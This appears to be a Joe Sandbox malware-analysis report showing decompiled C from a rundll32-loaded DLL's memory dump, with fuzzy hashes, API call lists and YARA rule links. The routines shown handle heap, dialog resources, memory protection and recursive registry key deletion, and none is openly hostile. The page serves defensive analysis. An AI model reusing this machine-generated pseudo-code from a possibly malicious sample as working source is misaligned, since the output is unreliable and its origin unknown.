Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExchangeInterlocked$QueryVirtual
String ID:
API String ID: 2947987494-0
Opcode ID: a92e8bdecec280d67aebfc8bcd6e3637f2153321ce66abaa1df021a309a4e260
Instruction ID: 13da356d60a0ce488386f7cf4b3a526205ffe0f674f80f842afbf78077e81b88
Opcode Fuzzy Hash: a92e8bdecec280d67aebfc8bcd6e3637f2153321ce66abaa1df021a309a4e260
Instruction Fuzzy Hash: 9851D130E00A62CFDB15CF68CCD475977E2EB8A398F258169E8428F295E771EDC2C640

Uniqueness

Uniqueness Score: -1.00%

Function 10012D2C Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E10012D2C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t30;
				long _t31;
				long _t33;
				void* _t36;
				long _t38;
				long _t41;
				long _t42;
				long _t44;
				long _t46;
				void* _t59;
				long _t61;
				void* _t67;
				void* _t68;

				_push(0x14);
				_push(0x1002e8f8);
				E10012CE0(__ebx, __edi, __esi);
				_t59 =  *(_t67 + 8);
				if(_t59 != 0) {
					_t61 =  *(_t67 + 0xc);
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *0x1003b804 - 3;
						if( *0x1003b804 != 3) {
							while(1) {
								_t28 = 0;
								__eflags = _t61 - 0xffffffe0;
								if(_t61 <= 0xffffffe0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t28 = HeapReAlloc( *0x1003b800, 0, _t59, _t61);
								}
								__eflags = _t28;
								if(_t28 != 0) {
									goto L37;
								}
								__eflags =  *0x1003a33c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								_t30 = E10015832(_t61);
								__eflags = _t30;
								if(_t30 != 0) {
									continue;
								}
								goto L36;
							}
							goto L37;
						} else {
							goto L5;
						}
						do {
							L5:
							 *(_t67 - 0x1c) = 0;
							__eflags = _t61 - 0xffffffe0;
							if(_t61 > 0xffffffe0) {
								L25:
								_t28 =  *(_t67 - 0x1c);
								__eflags =  *(_t67 - 0x1c);
								if( *(_t67 - 0x1c) != 0) {
									goto L37;
								}
								__eflags =  *0x1003a33c; // 0x0
								if(__eflags == 0) {
									goto L37;
								}
								goto L27;
							}
							E10014CDE(0, _t59, 4);
							 *(_t67 - 4) = 0;
							_t33 = E10014D57(_t59);
							 *(_t67 - 0x20) = _t33;
							__eflags = _t33;
							if(_t33 == 0) {
								L21:
								 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
								E10012E94();
								__eflags =  *(_t67 - 0x20);
								if( *(_t67 - 0x20) == 0) {
									__eflags = _t61;
									if(_t61 == 0) {
										_t61 = 1;
										__eflags = 1;
									}
									_t61 = _t61 + 0x0000000f & 0xfffffff0;
									__eflags = _t61;
									 *(_t67 + 0xc) = _t61;
									 *(_t67 - 0x1c) = HeapReAlloc( *0x1003b800, 0, _t59, _t61);
								}
								goto L25;
							}
							__eflags = _t61 -  *0x1003b7f0; // 0x0
							if(__eflags <= 0) {
								_push(_t61);
								_push(_t59);
								_push(_t33);
								_t41 = E10015257();
								_t68 = _t68 + 0xc;
								__eflags = _t41;
								if(_t41 == 0) {
									_push(_t61);
									_t42 = E10015536();
									 *(_t67 - 0x1c) = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										_t44 =  *((intOrPtr*)(_t59 - 4)) - 1;
										 *(_t67 - 0x24) = _t44;
										__eflags = _t44 - _t61;
										if(_t44 >= _t61) {
											_t44 = _t61;
										}
										E10011CC0( *(_t67 - 0x1c), _t59, _t44);
										_t46 = E10014D57(_t59);
										 *(_t67 - 0x20) = _t46;
										_push(_t59);
										_push(_t46);
										E10014D82();
										_t68 = _t68 + 0x18;
									}
								} else {
									 *(_t67 - 0x1c) = _t59;
								}
							}
							__eflags =  *(_t67 - 0x1c);
							if( *(_t67 - 0x1c) == 0) {
								__eflags = _t61;
								if(_t61 == 0) {
									_t61 = 1;
									__eflags = 1;
									 *(_t67 + 0xc) = 1;
								}
								_t61 = _t61 + 0x0000000f & 0xfffffff0;
								 *(_t67 + 0xc) = _t61;
								_t36 = HeapAlloc( *0x1003b800, 0, _t61);
								 *(_t67 - 0x1c) = _t36;
								__eflags = _t36;
								if(_t36 != 0) {
									_t38 =  *((intOrPtr*)(_t59 - 4)) - 1;
									 *(_t67 - 0x24) = _t38;
									__eflags = _t38 - _t61;
									if(_t38 >= _t61) {
										_t38 = _t61;
									}
									E10011CC0( *(_t67 - 0x1c), _t59, _t38);
									_push(_t59);
									_push( *(_t67 - 0x20));
									E10014D82();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E10015832(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E1001111B();
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E10011233( *(_t67 + 0xc));
					L37:
					return E10012D1B(_t28);
				}
			}

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df5a29b0ae4f8ee9308cb7d2da71c9a230697a7438a9e5377a91f2938de3118a
Instruction ID: 9c96b4c689c58b539e8ae89f5bc5b66854a000cef3f3b6c36b6fe0eca7dee594
Opcode Fuzzy Hash: df5a29b0ae4f8ee9308cb7d2da71c9a230697a7438a9e5377a91f2938de3118a
Instruction Fuzzy Hash: E641B1B5D0026AAACF11EF65DC8489F7AF4EB417A47124129F924AF191D730DDE1CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000780B Relevance: 7.6, APIs: 5, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1000780B(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E10027747() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E10007404( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E1001F51F(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E1001D9E9(_t93, __eflags);
									} else {
										_push(_v12);
										E1001DA12(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E10007404( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 10007834
LoadResource.KERNEL32(?,00000000), ref: 10007840
LockResource.KERNEL32(00000000), ref: 10007855
FreeResource.KERNEL32(00000000), ref: 10007888
GetDlgItem.USER32 ref: 10007932

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeItemLoadLock
String ID:
API String ID: 996205394-0
Opcode ID: 5f164a4374ed0bc4e462ab176c3203574c5e3f7cf5b8794c4b3e3ad33105d570
Instruction ID: c7b5fc4d005d0bad37349b5c4922ae84c6c4ed43775b19cc7b128b96645b94f8
Opcode Fuzzy Hash: 5f164a4374ed0bc4e462ab176c3203574c5e3f7cf5b8794c4b3e3ad33105d570
Instruction Fuzzy Hash: 67515C75D00249EFEB14DFA4C884AADBBB5FF04390F20C4A9E9199B265D734EA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10009F31 Relevance: 7.6, APIs: 5, Instructions: 126
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10009F31(void* __ecx) {
				void* _t62;
				void* _t63;
				void* _t75;

				E10011A8C(E1002AB54, _t75);
				_t62 =  *((intOrPtr*)(_t75 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x1000a11d) & 0x000000ff) * 4 +  &M1000A0F5))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t75 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E1000A747( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E1002320B();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E100071A9(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E10027868(__ebp + 0xc, __esi);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E10024F03(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E10024F5E(__ebp - 0x20);
							}
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E10009499( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E10009811(__esi, __eax);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E1002320B();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E10027868(__ebp + 0xc, __esi);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E10002EB0(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return _t63;
			}

APIs

__EH_prolog.LIBCMT ref: 10009F36
SendMessageA.USER32(?,00000138,?,?), ref: 10009FBA
GetBkColor.GDI32(?), ref: 10009FC3
GetTextColor.GDI32(?), ref: 10009FCF
GetThreadLocale.KERNEL32(0000F1C0), ref: 1000A061

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: 5b46a2f0a4d9aeb6bd3d3888704014459c5a64464480e5c1a809dedaa06e353e
Instruction ID: 905547f011d5b54e7a51ea35d25ef1f1897d24009aaa0b6ac730ed335b3b68b1
Opcode Fuzzy Hash: 5b46a2f0a4d9aeb6bd3d3888704014459c5a64464480e5c1a809dedaa06e353e
Instruction Fuzzy Hash: 87518B3590070ADFDB20CF64C88499EB7B0FF05350F218A59E85A9B3A5EBB4F885DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10025C20 Relevance: 7.6, APIs: 5, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10025C20(intOrPtr __ecx) {
				intOrPtr _t30;
				long _t35;
				signed int _t43;
				intOrPtr _t45;
				long _t47;
				struct HWND__* _t50;
				CHAR* _t51;
				int _t52;
				long _t58;
				intOrPtr _t61;
				void* _t64;
				void* _t66;

				_t64 = _t66 - 0x98;
				_t30 =  *0x100371f4; // 0x82d1d2ba
				_t61 = __ecx;
				_t58 = 0;
				_push(0);
				 *((intOrPtr*)(_t64 + 0x94)) = _t30;
				 *((intOrPtr*)(_t64 - 0x7c)) = __ecx;
				E10025B55();
				_t50 = E10025B82(0, _t64 - 0x74);
				 *(_t64 - 0x80) = _t50;
				if(_t50 !=  *(_t64 - 0x74)) {
					EnableWindow(_t50, 1);
				}
				if(_t50 == 0) {
					L5:
					if(_t61 != 0) {
						_t58 = _t61 + 0x74;
					}
					L7:
					 *(_t64 - 0x78) =  *(_t64 - 0x78) & 0x00000000;
					if(_t58 != 0) {
						 *(_t64 - 0x78) =  *_t58;
						_t45 =  *((intOrPtr*)(_t64 + 0xa8));
						if(_t45 != 0) {
							 *_t58 = _t45 + 0x30000;
						}
					}
					if(( *(_t64 + 0xa4) & 0x000000f0) == 0) {
						_t43 =  *(_t64 + 0xa4) & 0x0000000f;
						if(_t43 <= 1 || _t43 > 2 && _t43 <= 4) {
							 *(_t64 + 0xa4) =  *(_t64 + 0xa4) | 0x00000030;
						}
					}
					 *(_t64 - 0x70) = 0;
					if(_t61 == 0) {
						_t51 = _t64 - 0x70;
						_t35 = GetModuleFileNameA(0, _t51, 0x104);
						_t61 =  *((intOrPtr*)(_t64 - 0x7c));
						if(_t35 == 0x104) {
							 *((char*)(_t64 + 0x93)) = 0;
						}
					} else {
						_t51 =  *(_t61 + 0x4c);
					}
					_t52 = MessageBoxA( *(_t64 - 0x80),  *(_t64 + 0xa0), _t51,  *(_t64 + 0xa4));
					if(_t58 != 0) {
						 *_t58 =  *(_t64 - 0x78);
					}
					if( *(_t64 - 0x74) != 0) {
						EnableWindow( *(_t64 - 0x74), 1);
					}
					_push(1);
					E10025B55();
					return E10011A49(_t52,  *((intOrPtr*)(_t64 + 0x94)));
				}
				_t47 = SendMessageA(_t50, 0x376, 0, 0);
				if(_t47 == 0) {
					goto L5;
				} else {
					_t58 = _t47;
					goto L7;
				}
			}

APIs

Part of subcall function 10025B82: GetParent.USER32(?), ref: 10025BD5
Part of subcall function 10025B82: GetLastActivePopup.USER32(?), ref: 10025BE4
Part of subcall function 10025B82: IsWindowEnabled.USER32(?), ref: 10025BF9
Part of subcall function 10025B82: EnableWindow.USER32(?,00000000), ref: 10025C0C

EnableWindow.USER32(?,00000001), ref: 10025C60
SendMessageA.USER32(?,00000376,00000000,00000000), ref: 10025C74
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 10025CEA
MessageBoxA.USER32 ref: 10025D0E
EnableWindow.USER32(?,00000001), ref: 10025D2A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 489645344-0
Opcode ID: 7eeb4a5366b1176224571fdbe8bbc300a38818d4963199f985bc7225734bc818
Instruction ID: 6c202a0c4669d05dddf5519bf7c771b1bfe76587600dfaecdd07e7803bbc8ff2
Opcode Fuzzy Hash: 7eeb4a5366b1176224571fdbe8bbc300a38818d4963199f985bc7225734bc818
Instruction Fuzzy Hash: 6831B431A003599FEB31DF64DC85B9D7BF8EF45746F700129EA0AAB281E7B29D008B14

Uniqueness

Uniqueness Score: -1.00%

Function 100114D8 Relevance: 7.6, APIs: 5, Instructions: 92
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100114D8(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E100116D0(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x1003a174; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
											VirtualAlloc(_v8, _v12, 0x1000, 4);
											_t35 =  *0x1003a174; // 0x2
											L14:
											asm("sbb eax, eax");
											_t33 = VirtualProtect(_v8, _v12, ( ~(_t35 - 1) & 0x00000103) + 1,  &_v16);
										} else {
											goto L9;
										}
									} else {
										_t33 = 1;
									}
								}
								goto L15;
							}
							goto L9;
						}
					}
				}
				L15:
				return _t33;
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 10011587
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 100115AD

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: 97a50c7f13db13dee5731814e999132948e6409a17082cbcdfe079a2ef9554a8
Instruction ID: 2a7587c6a6ccc183a4930b34cb1094d21f40c1ebdf9b0ce79955c776c87e8298
Opcode Fuzzy Hash: 97a50c7f13db13dee5731814e999132948e6409a17082cbcdfe079a2ef9554a8
Instruction Fuzzy Hash: 4831D532E0061DEBDF15CBA4CD85AEE7BB9EB44364F110166E902EB190D731DE81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10026FE0 Relevance: 7.6, APIs: 5, Instructions: 70
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E10026FE0(void* __edx) {
				intOrPtr _t28;
				signed int _t31;
				signed int _t35;
				signed int _t44;
				void* _t52;
				void* _t58;
				void* _t60;

				_t52 = __edx;
				E10011A8C(E1002A776, _t58);
				_t28 =  *0x100371f4; // 0x82d1d2ba
				_push(_t44);
				 *((intOrPtr*)(_t58 - 0x14)) = _t28;
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0x11c;
				_t31 = RegOpenKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)), _t58 - 0x124);
				_t56 = _t31;
				if(_t31 == 0) {
					while(1) {
						_t35 = RegEnumKeyA( *(_t58 - 0x124), 0, _t58 - 0x11c, 0x104);
						_t56 = _t35;
						_t64 = _t56;
						if(_t56 != 0) {
							break;
						}
						 *(_t58 - 4) =  *(_t58 - 4) & _t35;
						_push(_t58 - 0x11c);
						E100072DF(_t58 - 0x120, _t64);
						 *(_t58 - 4) = 1;
						_t56 = E10026FE0(_t52,  *(_t58 - 0x124), _t58 - 0x120);
						_t44 = _t44 & 0xffffff00 | _t56 != 0x00000000;
						 *(_t58 - 4) = 0;
						E10002EB0( *((intOrPtr*)(_t58 - 0x120)) + 0xfffffff0, _t52);
						if(_t44 == 0) {
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t56 - 0x103;
					if(_t56 == 0x103) {
						L6:
						_t56 = RegDeleteKeyA( *(_t58 + 8),  *( *(_t58 + 0xc)));
					} else {
						__eflags = _t56 - 0x3f2;
						if(_t56 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t58 - 0x124));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return E10011A49(_t56,  *((intOrPtr*)(_t58 - 0x14)));
			}

APIs

__EH_prolog.LIBCMT ref: 10026FE5
RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002700E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 10027032
RegDeleteKeyA.ADVAPI32(?,?), ref: 100270C5
RegCloseKey.ADVAPI32(?), ref: 100270D3

Part of subcall function 100072DF: __EH_prolog.LIBCMT ref: 100072E4

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog$CloseDeleteEnumOpen
String ID:
API String ID: 4272528234-0
Opcode ID: de41e07131146d6c51b0b06f95e967c4d17f8aae6e93a8b2909c4cf4472956af
Instruction ID: e4ea11f03fdf571fccec0f23b9cd64b61358b81ed8f88b6a32dc33c99e0bc630
Opcode Fuzzy Hash: de41e07131146d6c51b0b06f95e967c4d17f8aae6e93a8b2909c4cf4472956af
Instruction Fuzzy Hash: 9C216B36D00129DBDB22DB58DD81BDEBBB4FB08350F1042A5E959A72A0D7309E54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10026753 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10026753(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x1003a0a8; // 0x60
					_t12 =  *0x1003a0ac; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10024CF2(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,1000A594,?,00000000,?,742C8B90), ref: 10026763
GetDeviceCaps.GDI32(?,00000058), ref: 1002679D
GetDeviceCaps.GDI32(?,0000005A), ref: 100267A6

